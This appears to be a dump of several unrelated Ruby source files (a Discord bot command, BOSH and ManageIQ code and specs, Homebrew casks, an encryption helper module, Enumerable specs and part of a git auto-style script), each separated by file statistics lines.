def long_example?
example.length > 1024
end
end
command([:ud, :urban],
description: 'look up a word on Urban Dictionary',
usage: "#{BOT.prefix}urban (word)") do |event, *term|
term = term.join(' ')
word = UrbanDictionary.random.first if term.empty?
word ||= UrbanDictionary.define(term).first
next "Couldn't find anything for `#{term}` 😕" unless word
url = "... [(Read More)](#{word.url})"
word.example.delete!('*')
event.channel.send_embed do |e|
e.add_field name: 'Definition', value: word.long_text? ? truncate(word.text, url) : word.text, inline: false
if word.example
e.add_field name: 'Example', value: word.long_example? ? truncate(word.example, '...') : word.example, inline: false
end
e.add_field name: "\u200B", value: "⬆️ `#{word.thumbs_up}` ⬇️ `#{word.thumbs_down}`", inline: false
e.author = {
icon_url: 'http://www.dimensionalbranding.com/userfiles/urban_dictionary.jpg',
name: word.word,
url: word.url
}
e.footer = { text: "Author: #{word.author}" }
e.color = 5800090
end
end
module_function
def truncate(text, append = '')
maxlength = 1024 - append.length
text[0...maxlength].strip + append
end
end
end
end
| 32.038462 | 128 | 0.567827 |
ab776f909854ff65fa05ceaa8372730d8f9f7e5b | 1,033 | module CircuitSwitch
class Configuration
CIRCUIT_SWITCH = 'circuit_switch'.freeze
attr_accessor :reporter, :due_date_notifier
attr_writer :report_paths, :report_if, :due_date, :with_backtrace, :allowed_backtrace_paths, :strip_paths
def report_paths
@report_paths ||= [Rails.root]
end
def silent_paths=(paths)
@silent_paths = paths.append(CIRCUIT_SWITCH).uniq
end
def silent_paths
@silent_paths ||= [CIRCUIT_SWITCH]
end
def report_if
@report_if ||= Rails.env.production?
end
def enable_report?
report_if.respond_to?(:call) ? report_if.call : !!report_if
end
def key_column_name=(key)
::CircuitSwitch::CircuitSwitch.alias_attribute :key, key
end
def due_date
@due_date ||= Date.today + 10
end
def with_backtrace
@with_backtrace ||= false
end
def allowed_backtrace_paths
@allowed_backtrace_paths ||= [Dir.pwd]
end
def strip_paths
@strip_paths ||= [Dir.pwd]
end
end
end
| 21.081633 | 109 | 0.668925 |
d5cce6308bf55b2ad4601aa4a7d33d5ccb9b1d27 | 5,595 | module Bosh::Director
module DeploymentPlan
class RuntimeManifestParser
include ValidationHelper
def initialize(logger, deployment=nil)
@deployment = deployment
@logger = logger
end
def parse(runtime_manifest)
parse_releases(runtime_manifest)
parse_addons(runtime_manifest)
end
private
def parse_releases(runtime_manifest)
@release_specs = []
if runtime_manifest['release']
if runtime_manifest['releases']
raise RuntimeAmbiguousReleaseSpec,
"Runtime manifest contains both 'release' and 'releases' " +
'sections, please use one of the two.'
end
@release_specs << runtime_manifest['release']
else
safe_property(runtime_manifest, 'releases', :class => Array).each do |release|
@release_specs << release
end
end
@release_specs.each do |release_spec|
if release_spec['version'] == 'latest'
raise RuntimeInvalidReleaseVersion,
"Runtime manifest contains the release '#{release_spec['name']}' with version as 'latest'. " +
"Please specify the actual version string."
end
if @deployment
deployment_release = @deployment.release(release_spec["name"])
if deployment_release
if deployment_release.version != release_spec["version"].to_s
raise RuntimeInvalidDeploymentRelease, "Runtime manifest specifies release '#{release_spec["name"]}' with version as '#{release_spec["version"]}'. " +
"This conflicts with version '#{deployment_release.version}' specified in the deployment manifest."
else
next
end
end
release_version = DeploymentPlan::ReleaseVersion.new(@deployment.model, release_spec)
release_version.bind_model
@deployment.add_release(release_version)
end
end
end
def parse_addons(runtime_manifest)
addons = safe_property(runtime_manifest, 'addons', :class => Array, :default => [])
addons.each do |addon_spec|
deployment_plan_templates = []
addon_jobs = safe_property(addon_spec, 'jobs', :class => Array, :default => [])
addon_jobs.each do |addon_job|
if !@release_specs.find { |release_spec| release_spec['name'] == addon_job['release'] }
raise RuntimeReleaseNotListedInReleases,
"Runtime manifest specifies job '#{addon_job['name']}' which is defined in '#{addon_job['release']}', but '#{addon_job['release']}' is not listed in the releases section."
end
if @deployment
valid_release_versions = @deployment.releases.map {|r| r.name }
deployment_release_ids = Models::Release.where(:name => valid_release_versions).map {|r| r.id}
deployment_jobs = @deployment.jobs
templates_from_model = Models::Template.where(:name => addon_job['name'], :release_id => deployment_release_ids)
if templates_from_model == nil
raise "Job '#{addon_job['name']}' not found in Template table"
end
release = @deployment.release(addon_job['release'])
release.bind_model
template = DeploymentPlan::Template.new(release, addon_job['name'])
deployment_jobs.each do |j|
templates_from_model.each do |template_from_model|
if template_from_model.consumes != nil
template_from_model.consumes.each do |consumes|
template.add_link_from_release(j.name, 'consumes', consumes["name"], consumes)
end
end
if template_from_model.provides != nil
template_from_model.provides.each do |provides|
template.add_link_from_release(j.name, 'provides', provides["name"], provides)
end
end
end
provides_links = safe_property(addon_job, 'provides', class: Hash, optional: true)
provides_links.to_a.each do |link_name, source|
template.add_link_from_manifest(j.name, "provides", link_name, source)
end
consumes_links = safe_property(addon_job, 'consumes', class: Hash, optional: true)
consumes_links.to_a.each do |link_name, source|
template.add_link_from_manifest(j.name, 'consumes', link_name, source)
end
if addon_job.has_key?('properties')
template.add_template_scoped_properties(addon_job['properties'], j.name)
end
end
template.bind_models
deployment_plan_templates.push(template)
deployment_jobs.each do |job|
merge_addon(job, deployment_plan_templates, addon_spec['properties'])
end
end
end
end
end
def merge_addon(job, templates, properties)
if job.templates
job.templates.concat(templates)
else
job.templates = templates
end
if properties
if job.all_properties
job.all_properties.merge!(properties)
else
job.all_properties = properties
end
end
end
end
end
end
| 38.061224 | 191 | 0.586774 |
d500c4717a4410119f9e9cd417778abdd593923d | 18,639 | describe User do
context "validations" do
it "should ensure presence of name" do
expect(FactoryGirl.build(:user, :name => nil)).not_to be_valid
end
it "should ensure presence of user id" do
expect(FactoryGirl.build(:user, :userid => nil)).not_to be_valid
end
it "should invalidate incorrect email address" do
expect(FactoryGirl.build(:user, :email => "thisguy@@manageiq.com")).not_to be_valid
end
it "should validate email address with a value of nil" do
expect(FactoryGirl.build(:user, :email => nil)).to be_valid
end
it "should save proper email address" do
expect(FactoryGirl.build(:user, :email => "[email protected]")).to be_valid
end
end
describe "#change_password" do
let(:user) { FactoryGirl.create(:user, :password => "smartvm") }
it "should change user password" do
password = user.password
newpassword = "newpassword"
user.change_password(password, newpassword)
expect(user.password).to eq(newpassword)
end
it "should raise an error when asked to change user password" do
password = "wrongpwd"
newpassword = "newpassword"
expect { user.change_password(password, newpassword) }
.to raise_error(MiqException::MiqEVMLoginError)
end
end
context "filter methods" do
let(:user) { FactoryGirl.create(:user, :miq_groups => [miq_group]) }
let(:mfilters) { {"managed" => "m"} }
let(:bfilters) { {"belongsto" => "b"} }
let(:miq_group) { FactoryGirl.create(:miq_group, :entitlement => entitlement) }
let(:entitlement) do
entitlement = FactoryGirl.create(:entitlement)
entitlement.set_managed_filters(mfilters)
entitlement.set_belongsto_filters(bfilters)
entitlement.save!
entitlement
end
it "should check for and get Managed and Belongs-to filters from the group" do
expect(user.has_filters?).to be_truthy
expect(user.get_managed_filters).to eq(mfilters)
expect(user.get_belongsto_filters).to eq(bfilters)
end
end
context "timezone methods" do
let!(:miq_server) { EvmSpecHelper.local_miq_server }
let(:user) { FactoryGirl.create(:user) }
describe "#get_timezone" do
it "gets Server time zone setting" do
expect(user.get_timezone).to eq("UTC")
end
end
describe "#with_my_timezone" do
it "sets the user's zone in a block" do
user.settings.store_path(:display, :timezone, "Hawaii")
user.with_my_timezone do
expect(Time.zone.to_s).to eq("(GMT-10:00) Hawaii")
end
expect(Time.zone.to_s).to eq("(GMT+00:00) UTC")
end
end
end
describe ".missing_user_features" do
it "user with group and role returns nil" do
user = FactoryGirl.create(:user_admin)
expect(User.missing_user_features(user)).to be_nil
end
it "no user returns 'User'" do
expect(User.missing_user_features(nil)).to eq "User"
end
it "missing group returns 'Group'" do
user = FactoryGirl.create(:user)
expect(User.missing_user_features(user)).to eq "Group"
end
it "missing role returns 'Role'" do
user = FactoryGirl.create(:user_with_group)
expect(User.missing_user_features(user)).to eq "Role"
end
end
describe "role methods" do
let(:user) do
FactoryGirl.create(:user,
:settings => {"Setting1" => 1, "Setting2" => 2, "Setting3" => 3},
:role => role_name)
end
describe "#self_service?" do
let(:role_name) { "user_self_service" }
it "checks Self Service roles" do
expect(user.self_service?).to be_truthy
expect(user.super_admin_user?).to be_falsey
user.current_group = nil
expect(user.self_service?).to be_falsey
end
end
describe "#limited_self_service?" do
let(:role_name) { "user_limited_self_service" }
it "checks Self Service roles" do
expect(user.limited_self_service?).to be_truthy
expect(user.super_admin_user?).to be_falsey
user.current_group = nil
expect(user.limited_self_service?).to be_falsey
end
end
describe "#super_admin_user?" do
let(:role_name) { "super_administrator" }
it "checks Super Admin roles" do
expect(user.super_admin_user?).to be_truthy
user.current_group = nil
expect(user.super_admin_user?).to be_falsey
end
end
describe "#admin_user?" do
let(:role_name) { "administrator" }
it "should check Admin Roles" do
expect(user.admin_user?).to be_truthy
expect(user.super_admin_user?).to be_falsey
user.current_group = nil
expect(user.admin_user?).to be_falsey
end
end
end
context "#authorize_ldap" do
before(:each) do
@fq_user = "[email protected]"
@task = MiqTask.create(:name => "LDAP User Authorization of '#{@fq_user}'", :userid => @fq_user)
@auth_config =
{:authentication => {:ldapport => "389",
:basedn => "dc=manageiq,dc=com",
:follow_referrals => false,
:get_direct_groups => true,
:bind_dn => "[email protected]",
:mode => "ldap", :user_proxies => [{}],
:user_type => "userprincipalname",
:bind_pwd => "blah",
:ldap_role => true,
:user_suffix => "manageiq.com",
:group_memberships_max_depth => 2,
:ldaphost => ["192.168.254.15"]}
}
stub_server_configuration(@auth_config)
@miq_ldap = double('miq_ldap')
allow(@miq_ldap).to receive_messages(:bind => false)
end
it "will fail task if user object not found in ldap" do
allow(@miq_ldap).to receive_messages(:get_user_object => nil)
expect(AuditEvent).to receive(:failure).once
authenticate = Authenticator::Ldap.new(@auth_config[:authentication])
allow(authenticate).to receive_messages(:ldap => @miq_ldap)
expect(authenticate.authorize(@task.id, @fq_user)).to be_nil
@task.reload
expect(@task.state).to eq("Finished")
expect(@task.status).to eq("Error")
expect(@task.message).to match(/unable to find user object/)
end
it "will fail task if user group doesn't match an EVM role" do
allow(@miq_ldap).to receive_messages(:get_user_object => "user object")
allow(@miq_ldap).to receive_messages(:get_attr => nil)
allow(@miq_ldap).to receive_messages(:normalize => "a-username")
authenticate = Authenticator::Ldap.new(@auth_config[:authentication])
allow(authenticate).to receive_messages(:ldap => @miq_ldap)
allow(authenticate).to receive_messages(:groups_for => [])
expect(AuditEvent).to receive(:failure).once
expect(authenticate.authorize(@task.id, @fq_user)).to be_nil
@task.reload
expect(@task.state).to eq("Finished")
expect(@task.status).to eq("Error")
expect(@task.message).to match(/unable to match user's group membership/)
end
end
context "group assignment" do
before(:each) do
@group1 = FactoryGirl.create(:miq_group, :description => "EvmGroup 1")
@group2 = FactoryGirl.create(:miq_group, :description => "EvmGroup 2")
@group3 = FactoryGirl.create(:miq_group, :description => "EvmGroup 3")
end
describe "#miq_groups=" do
before(:each) do
@user = FactoryGirl.create(:user, :miq_groups => [@group3])
end
it "sets miq_groups" do
expect(@user.miq_groups).to match_array [@group3]
end
it "sets current_group" do
expect(@user.current_group).to eq(@group3)
end
it "when including current group" do
@user.miq_groups = [@group1, @group2, @group3]
expect(@user.valid?).to be_truthy
expect(@user.current_group).to eq(@group3)
end
it "when not including currrent group" do
@user.miq_groups = [@group1, @group2]
expect(@user.valid?).to be_truthy
expect(@user.current_group).to eq(@group1)
end
it "when nil" do
expect { @user.miq_groups = nil }.to raise_error(NoMethodError)
end
end
describe "#current_group=" do
before(:each) do
@user = FactoryGirl.create(:user, :miq_groups => [@group1, @group2])
end
it "sets current_group" do
expect(@user.current_group).to eq(@group1)
end
it "when belongs to miq_groups" do
expect(@user.valid?).to be_truthy
end
it "when not belongs to miq_groups" do
@user.miq_groups = [@group2, @group3]
expect(@user.current_group).to eq(@group2)
end
it "when nil" do
@user.current_group = nil
expect(@user.valid?).to be_truthy
end
end
end
context "Testing active VM aggregation" do
before :each do
@ram_size = 1024
@disk_size = 1_000_000
@num_cpu = 2
group = FactoryGirl.create(:miq_group)
@user = FactoryGirl.create(:user, :miq_groups => [group])
@ems = FactoryGirl.create(:ems_vmware, :name => "test_vcenter")
@storage = FactoryGirl.create(:storage, :name => "test_storage_nfs", :store_type => "NFS")
@hw1 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@hw2 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@hw3 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@hw4 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@disk1 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw1.id)
@disk2 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw2.id)
@disk3 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw3.id)
@disk4 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw4.id)
@active_vm = FactoryGirl.create(:vm_vmware,
:name => "Active VM",
:evm_owner_id => @user.id,
:ems_id => @ems.id,
:storage_id => @storage.id,
:hardware => @hw1)
@archived_vm = FactoryGirl.create(:vm_vmware,
:name => "Archived VM",
:evm_owner_id => @user.id,
:hardware => @hw2)
@orphaned_vm = FactoryGirl.create(:vm_vmware,
:name => "Orphaned VM",
:evm_owner_id => @user.id,
:storage_id => @storage.id,
:hardware => @hw3)
@retired_vm = FactoryGirl.create(:vm_vmware,
:name => "Retired VM",
:evm_owner_id => @user.id,
:retired => true,
:hardware => @hw4)
end
it "#active_vms" do
expect(@user.active_vms).to match_array([@active_vm])
end
it "#allocated_memory" do
expect(@user.allocated_memory).to eq(@ram_size.megabyte)
end
it "#allocated_vcpu" do
expect(@user.allocated_vcpu).to eq(@num_cpu)
end
it "#allocated_storage" do
expect(@user.allocated_storage).to eq(@disk_size)
end
it "#provisioned_storage" do
expect(@user.provisioned_storage).to eq(@ram_size.megabyte + @disk_size)
end
%w(allocated_memory allocated_vcpu allocated_storage provisioned_storage).each do |vcol|
it "should have virtual column #{vcol} " do
expect(described_class).to have_virtual_column vcol.to_s, :integer
end
end
end
context ".authenticate_with_http_basic" do
let(:user) { FactoryGirl.create(:user, :password => "dummy") }
it "should login with good username/password" do
expect(User.authenticate_with_http_basic(user.userid, user.password)).to eq([true, user.userid])
end
it "should fail with bad username" do
bad_userid = "bad_userid"
expect(User.authenticate_with_http_basic(bad_userid, user.password)).to eq([false, bad_userid])
end
it "should fail with bad password" do
expect(User.authenticate_with_http_basic(user.userid, "bad_pwd")).to eq([false, user.userid])
end
end
context ".seed" do
include_examples(".seed called multiple times", 1)
include_examples("seeding users with", [])
include_examples("seeding users with", [MiqUserRole, MiqGroup])
end
context "#accessible_vms" do
before do
@user = FactoryGirl.create(:user_admin)
@self_service_role = FactoryGirl.create(
:miq_user_role,
:name => "ss_role",
:settings => {:restrictions => {:vms => :user_or_group}}
)
@self_service_group = FactoryGirl.create(:miq_group, :miq_user_role => @self_service_role)
@limited_self_service_role = FactoryGirl.create(
:miq_user_role,
:name => "lss_role",
:settings => {:restrictions => {:vms => :user}}
)
@limited_self_service_group = FactoryGirl.create(:miq_group, :miq_user_role => @limited_self_service_role)
@vm = []
(1..5).each { |i| @vm[i] = FactoryGirl.create(:vm_redhat, :name => "vm_#{i}") }
end
subject(:accessible_vms) { @user.accessible_vms }
it "non self service user" do
expect(accessible_vms.size).to eq(5)
end
it "self service user" do
@user.update_attributes(:miq_groups => [@self_service_group])
@vm[1].update_attributes(:evm_owner => @user)
@vm[2].update_attributes(:miq_group => @self_service_group)
expect(accessible_vms.size).to eq(2)
end
it "limited self service user" do
@user.update_attributes(:miq_groups => [@limited_self_service_group])
@vm[1].update_attributes(:evm_owner => @user)
@vm[2].update_attributes(:miq_group => @self_service_group)
@vm[3].update_attributes(:miq_group => @limited_self_service_group)
expect(accessible_vms.size).to eq(1)
end
end
describe "#current_group_by_description=" do
subject { FactoryGirl.create(:user, :miq_groups => [g1, g2], :current_group => g1) }
let(:g1) { FactoryGirl.create(:miq_group) }
let(:g2) { FactoryGirl.create(:miq_group) }
it "ignores blank" do
subject.current_group_by_description = ""
expect(subject.current_group).to eq(g1)
expect(subject.miq_group_description).to eq(g1.description)
end
it "ignores not found" do
subject.current_group_by_description = "not_found"
expect(subject.current_group).to eq(g1)
expect(subject.miq_group_description).to eq(g1.description)
end
it "ignores a group that you do not belong" do
subject.current_group_by_description = FactoryGirl.create(:miq_group).description
expect(subject.current_group).to eq(g1)
expect(subject.miq_group_description).to eq(g1.description)
end
it "sets by description" do
subject.current_group_by_description = g2.description
expect(subject.current_group).to eq(g2)
expect(subject.miq_group_description).to eq(g2.description)
end
context "as a super admin" do
subject { FactoryGirl.create(:user, :role => "super_administrator") }
it "sets any group, regardless of group membership" do
expect(subject).to be_super_admin_user
subject.current_group_by_description = g2.description
expect(subject.current_group).to eq(g2)
end
end
end
describe ".find_by_lower_email" do
it "uses cache" do
u = FactoryGirl.build(:user_with_email)
expect(User.find_by_lower_email(u.email.upcase, u)).to eq(u)
end
it "finds in the table" do
u = FactoryGirl.create(:user_with_email)
expect(User.find_by_lower_email(u.email.upcase)).to eq(u)
end
end
describe "#current_tenant" do
let(:user1) { FactoryGirl.create(:user_with_group) }
it "sets the tenant" do
User.with_user(user1) do
expect(User.current_tenant).to be_truthy
expect(User.current_tenant).to eq(user1.current_tenant)
end
end
end
describe "#current_user=" do
let(:user1) { FactoryGirl.create(:user) }
it "sets the user" do
User.current_user = user1
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
end
end
describe "#with_user" do
let(:user1) { FactoryGirl.create(:user) }
let(:user2) { FactoryGirl.create(:user) }
it "sets the user" do
User.with_user(user1) do
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
User.with_user(user2) do
expect(User.current_userid).to eq(user2.userid)
expect(User.current_user).to eq(user2)
end
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
end
end
# sorry. please help me delete this use case / parameter
it "supports a userid with a nil user" do
User.with_user(user1) do
User.with_user(nil, "oleg") do
expect(User.current_userid).to eq("oleg")
expect(User.current_user).not_to be
end
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
end
end
end
context ".super_admin" do
it "has super_admin" do
FactoryGirl.create(:miq_group, :role => "super_administrator")
User.seed
expect(User.super_admin).to be_super_admin_user
end
end
context ".admin?" do
it "admin? succeeds with admin account" do
expect(User.admin?("admin")).to be_truthy
end
it "admin? fails with non-admin account" do
expect(User.admin?("regular_user")).to be_falsey
end
end
context ".authorize_user" do
it "returns nil with blank userid" do
expect(User.authorize_user("")).to be_nil
end
it "returns nil with admin userid" do
expect(User.authorize_user("admin")).to be_nil
end
end
end
| 33.889091 | 112 | 0.620098 |
abf4c55fde61ec6066efe4aef4234277ff62b7a0 | 578 | cask 'discord' do
version '0.0.239'
sha256 'a4a262322e98785273b5774ebfb054d89f0e8170be8bde55f086596f4d32191c'
url "https://cdn.discordapp.com/apps/osx/#{version}/Discord.dmg"
name 'Discord'
homepage 'https://discordapp.com'
license :gratis
app 'Discord.app'
zap delete: [
'~/Library/Application Support/com.hnc.Discord.ShipIt',
'~/Library/Saved Application State/com.hnc.Discord.savedState',
'~/Library/Caches/com.hnc.Discord',
'~/Library/Preferences/com.hnc.Discord.plist',
]
end
| 30.421053 | 79 | 0.648789 |
bb936b44c51d28a15d431b5d5dd8eef95bccaa5a | 647 | cask 'futuniuniu' do
version '10.4.642_202004131013'
sha256 'f49aa27c4bdd0ae7f395e04e3539c713b97de871a0bd089eafd870d3ac5804a6'
# software-file-1251001049.file.myqcloud.com/ was verified as official when first introduced to the cask
url "https://software-file-1251001049.file.myqcloud.com/FTNNForMac_#{version}_website.dmg"
appcast 'https://www.futu5.com/tools'
name 'FutuNiuniu'
name '富途牛牛'
homepage 'https://hk.futu5.com/'
# Renamed for consistency: app name is different in the Finder and in a shell.
# Original discussion: https://github.com/Homebrew/homebrew-cask/pull/7435
app 'FutuNiuniu.app', target: '富途牛牛.app'
end
| 40.4375 | 106 | 0.769706 |
4ad2ffacb08ed91d39ac21a31ca421b4812c61e6 | 693 | #
# TeNOR - VNF Provisioning
#
# Copyright 2014-2016 i2CAT Foundation, Portugal Telecom Inovação
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative 'vnf'
require_relative 'scaling'
| 34.65 | 74 | 0.76912 |
110f8c331ea5f8177c4d1c74532caa1afdc1a2fb | 495 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_07_01
module Models
#
# Defines values for PcError
#
module PcError
InternalError = "InternalError"
AgentStopped = "AgentStopped"
CaptureFailed = "CaptureFailed"
LocalFileFailed = "LocalFileFailed"
StorageFailed = "StorageFailed"
end
end
end
| 24.75 | 70 | 0.70101 |
f86547660e385bbb1dbd2ec765e4fc277cc27779 | 259 | module CollectionFilters
class Engine < ::Rails::Engine
isolate_namespace CollectionFilters
config.generators do |g|
g.test_framework :rspec
g.fixture_replacement :factory_bot
g.factory_bot dir: 'spec/factories'
end
end
end
| 21.583333 | 41 | 0.718147 |
21e9ae73ed3e8fab4bc83ae07ee3e8bad2362e03 | 5,487 | module Vidibus
module Secure
class Error < StandardError; end
class KeyError < Error; end
class InputError < Error; end
class << self
# Define default settings for random, sign, and crypt.
def settings
@settings ||= {
:random => { :length => 50, :encoding => :base64 },
:sign => { :algorithm => "SHA256", :encoding => :hex },
:crypt => { :algorithm => "AES-256-CBC", :encoding => :base64 }
}
end
# Returns a truly random string.
# Now it is not much more than an interface for Ruby's SecureRandom,
# but that might change over time.
#
# Options:
# :length Length of string to generate
# :encoding Encoding of string; hex or base64
#
# Keep in mind that a hexadecimal string is less secure
# than a base64 encoded string with the same length!
#
def random(options = {})
options = settings[:random].merge(options)
length = options[:length]
SecureRandom.send(options[:encoding], length)[0,length]
end
# Returns signature of given data with given key.
def sign(data, key, options = {})
raise KeyError.new("Please provide a secret key to sign data with.") unless key
options = settings[:sign].merge(options)
digest = OpenSSL::Digest.new(options[:algorithm])
signature = OpenSSL::HMAC.digest(digest, key, data)
encode(signature, options)
end
# Encrypts given data with given key.
def encrypt(data, key, options = {})
raise KeyError.new("Please provide a secret key to encrypt data with.") unless key
options = settings[:crypt].merge(options)
unless data.is_a?(String)
data = JSON.generate(data)
end
encrypted_data = crypt(:encrypt, data, key, options)
encode(encrypted_data, options)
end
# Decrypts given data with given key.
def decrypt(data, key, options = {})
raise KeyError.new("Please provide a secret key to decrypt data with.") unless key
options = settings[:crypt].merge(options)
decoded_data = decode(data, options)
decrypted_data = crypt(:decrypt, decoded_data, key, options)
return data unless decrypted_data
begin
JSON.parse(decrypted_data)
rescue JSON::ParserError
decrypted_data
end
end
# Signs request.
def sign_request(verb, path, params, key, signature_param = nil)
default_signature_param = :sign
params_given = !!params
raise InputError.new("Given params is not a Hash.") if params_given and !params.is_a?(Hash)
params = {} unless params_given
signature_param ||= (params_given and params.keys.first.is_a?(String)) ? default_signature_param.to_s : default_signature_param
uri = URI.parse(path)
path_params = Rack::Utils.parse_nested_query(uri.query)
uri.query = nil
_verb = verb.to_s.downcase
_params = (params.merge(path_params)).except(signature_param.to_s, signature_param.to_s.to_sym)
signature_string = [
_verb,
uri.to_s.gsub(/\/+$/, ""),
_params.any? ? params_identifier(_params) : ""
].join("|")
signature = sign(signature_string, key)
if %w[post put].include?(_verb) or (params_given and path_params.empty?)
params[signature_param] = signature
else
unless path.gsub!(/(#{signature_param}=)[^&]+/, "\\1#{signature}")
glue = path.match(/\?/) ? "&" : "?"
path << "#{glue}#{signature_param}=#{signature}"
end
end
[path, params]
end
# Verifies that given request is valid.
def verify_request(verb, path, params, key, signature_param = nil)
params ||= {}
_path = path.dup
_params = params.dup
sign_request(verb, _path, _params, key, signature_param)
return (path == _path and params == _params)
end
protected
def crypt(cipher_method, data, key, options = {})
return unless data && data != ''
cipher = OpenSSL::Cipher::Cipher.new(options[:algorithm])
digest = OpenSSL::Digest::SHA512.new(key).digest
cipher.send(cipher_method)
cipher.pkcs5_keyivgen(digest)
result = cipher.update(data)
result << cipher.final
end
def encode(data, options = {})
return unless data
if options[:encoding] == :hex
data.unpack("H*").join
elsif options[:encoding] == :base64
[data].pack("m*")
end
end
def decode(data, options = {})
return unless data
if options[:encoding] == :hex
[data].pack("H*")
elsif options[:encoding] == :base64
data.unpack("m*").join
end
end
# Returns an identifier string from given params input.
#
# Example:
# {:some=>{:nested=>{:really=>["serious", "stuff"]}, :are=>"params"}}
# # => 1:some:2:are:params|2:nested:3:really:4:serious:|4:stuff:
#
def params_identifier(params, level = 1)
array = []
for key, value in params
if value.is_a?(Array) or value.is_a?(Hash)
value = params_identifier(value, level + 1)
end
array << "#{level}:#{key}:#{value}"
end
array.sort.join("|")
end
end
end
end
| 33.87037 | 135 | 0.585566 |
6280191d74ffb0285d49b815cb108b5b8996ce91 | 173 | Rails.application.config.middleware.use OmniAuth::Builder do
provider :storenvy, ENV['STORENVY_KEY'], ENV['STORENVY_SECRET'] #, :scope => 'store_write user store_read'
end | 57.666667 | 108 | 0.774566 |
61d63ba3d58bc366e9c5106ed3c1ecbc9ba777d4 | 2,605 | require_relative 'enumerable_enumeratorized'
describe :enumerable_find, shared: true do
# #detect and #find are aliases, so we only need one function
before :each do
ScratchPad.record []
@elements = [2, 4, 6, 8, 10]
@numerous = EnumerableSpecs::Numerous.new(*@elements)
@empty = []
end
it "passes each entry in enum to block while block when block is false" do
visited_elements = []
@numerous.send(@method) do |element|
visited_elements << element
false
end
visited_elements.should == @elements
end
it "returns nil when the block is false and there is no ifnone proc given" do
@numerous.send(@method) {|e| false }.should == nil
end
it "returns the first element for which the block is not false" do
@elements.each do |element|
@numerous.send(@method) {|e| e > element - 1 }.should == element
end
end
it "returns the value of the ifnone proc if the block is false" do
fail_proc = -> { "cheeseburgers" }
@numerous.send(@method, fail_proc) {|e| false }.should == "cheeseburgers"
end
it "doesn't call the ifnone proc if an element is found" do
fail_proc = -> { raise "This shouldn't have been called" }
@numerous.send(@method, fail_proc) {|e| e == @elements.first }.should == 2
end
it "calls the ifnone proc only once when the block is false" do
times = 0
fail_proc = -> { times += 1; raise if times > 1; "cheeseburgers" }
@numerous.send(@method, fail_proc) {|e| false }.should == "cheeseburgers"
end
it "calls the ifnone proc when there are no elements" do
fail_proc = -> { "yay" }
@empty.send(@method, fail_proc) {|e| true}.should == "yay"
end
it "ignores the ifnone argument when nil" do
@numerous.send(@method, nil) {|e| false }.should == nil
end
it "passes through the values yielded by #each_with_index" do
[:a, :b].each_with_index.send(@method) { |x, i| ScratchPad << [x, i]; nil }
ScratchPad.recorded.should == [[:a, 0], [:b, 1]]
end
it "returns an enumerator when no block given" do
@numerous.send(@method).should be_an_instance_of(Enumerator)
end
it "passes the ifnone proc to the enumerator" do
times = 0
fail_proc = -> { times += 1; raise if times > 1; "cheeseburgers" }
@numerous.send(@method, fail_proc).each {|e| false }.should == "cheeseburgers"
end
it "gathers whole arrays as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
multi.send(@method) {|e| e == [1, 2] }.should == [1, 2]
end
it_should_behave_like :enumerable_enumeratorized_with_unknown_size
end
| 33.397436 | 82 | 0.663724 |
035ac0173051b11b5fe8ab13998de8d09893a8e5 | 155 | class AddSlugsToUsers < ActiveRecord::Migration
def change
add_column :artists, :slug, :string
add_index :artists, :slug, unique: true
end
end
| 22.142857 | 47 | 0.729032 |
1ce5ba6b5e367a80cb4cc082f21a3f67457b7800 | 5,645 | #!/usr/bin/env ruby
# Usage:
# auto-style.rb [repo_path] [args...]
require 'shellwords'
require 'tmpdir'
ENV['LC_ALL'] = 'C'
class Git
attr_reader :depth
def initialize(oldrev, newrev, branch)
@oldrev = oldrev
@newrev = newrev
@branch = branch
with_clean_env do
@revs = {}
IO.popen(['git', 'log', '--format=%H %s', "#{@oldrev}..#{@newrev}"]) do |f|
f.each do |line|
line.chomp!
rev, subj = line.split(' ', 2)
@revs[rev] = subj
end
end
@depth = @revs.size
end
end
# ["foo/bar.c", "baz.h", ...]
def updated_paths
with_clean_env do
IO.popen(['git', 'diff', '--name-only', @oldrev, @newrev], &:readlines).each(&:chomp!)
end
end
# [0, 1, 4, ...]
def updated_lines(file)
lines = []
revs = @revs.filter_map {|rev, subj| rev unless subj.start_with?("Revert ")}
revs_pattern = /\A(?:#{revs.join('|')}) /
with_clean_env { IO.popen(['git', 'blame', '-l', '--', file], &:readlines) }.each_with_index do |line, index|
if revs_pattern =~ line
lines << index
end
end
lines
end
def commit(log, *files)
git('add', *files)
git('commit', '-m', log)
git('push', 'origin', @branch)
end
private
def git(*args)
cmd = ['git', *args].shelljoin
unless with_clean_env { system(cmd) }
abort "Failed to run: #{cmd}"
end
end
def with_clean_env
git_dir = ENV.delete('GIT_DIR') # this overcomes '-C' or pwd
yield
ensure
ENV['GIT_DIR'] = git_dir if git_dir
end
end
DEFAULT_GEM_LIBS = %w[
bundler
cmath
csv
e2mmap
fileutils
forwardable
ipaddr
irb
logger
matrix
mutex_m
ostruct
prime
rdoc
rexml
rss
scanf
shell
sync
thwait
tracer
webrick
]
DEFAULT_GEM_EXTS = %w[
bigdecimal
